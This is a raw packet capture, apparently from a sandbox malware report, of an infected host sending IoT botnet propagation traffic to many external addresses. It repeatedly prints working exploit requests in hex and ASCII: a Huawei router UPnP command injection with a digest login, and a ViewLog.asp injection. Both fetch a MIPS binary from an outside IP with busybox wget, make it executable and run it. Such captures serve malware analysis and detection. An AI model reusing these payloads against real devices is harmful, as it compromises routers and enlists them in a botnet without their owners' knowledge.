                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:58.245295048 CET886OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:58.507950068 CET236INHTTP/1.1 500 Internal Server Error
                                              Content-Type: text/xml; charset="utf-8"
                                              Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                              EXT:
                                              Connection: Keep-Alive
                                              Content-Length: 398


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              632192.168.2.134938431.197.131.48080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:58.382560968 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:58.580529928 CET1257INHTTP/1.1 307 Temporary Redirect
                                              Date: Thu, 23 Nov 2023 04:17:58 GMT
                                              Content-Type: text/html
                                              Content-Length: 152
                                              Connection: close
                                              Location: https://192.168.0.14:8080/cgi-bin/ViewLog.asp
                                              X-Frame-Options: SAMEORIGIN
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Strict-Transport-Security: max-age=31536000
                                              Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                              X-Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                              X-Webkit-CSP: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body bgcolor="white"><center><h1>307 Temporary Redirect</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              633192.168.2.136086862.131.183.1538080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:58.382610083 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:59.398231983 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              634192.168.2.134034085.239.40.2348080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:58.410444975 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              635192.168.2.134071631.136.49.1058080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:58.570626020 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:59.142215014 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:00.294233084 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:02.662213087 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:07.270196915 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:16.486174107 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              636192.168.2.136090295.72.195.2048080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:58.627831936 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:58.852674007 CET370INHTTP/1.1 403 Forbidden
                                              Server: Web server
                                              Date: Thu, 23 Nov 2023 04:17:55 GMT
                                              Content-Type: text/html
                                              Content-Length: 151
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>Web server</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              637192.168.2.135571094.121.139.2398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:58.627914906 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              638192.168.2.134804294.122.196.2488080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:59.300904989 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              639192.168.2.135587294.242.228.768080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:59.323775053 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              640192.168.2.134537494.131.63.178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:59.429090023 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:59.534243107 CET1314INHTTP/1.1 400 Bad Request
                                              Server: squid/6.0.0-20220501-re899e0c27
                                              Mime-Version: 1.0
                                              Date: Thu, 23 Nov 2023 04:17:59 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3572
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              Cache-Status: ezproxies.com
                                              Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 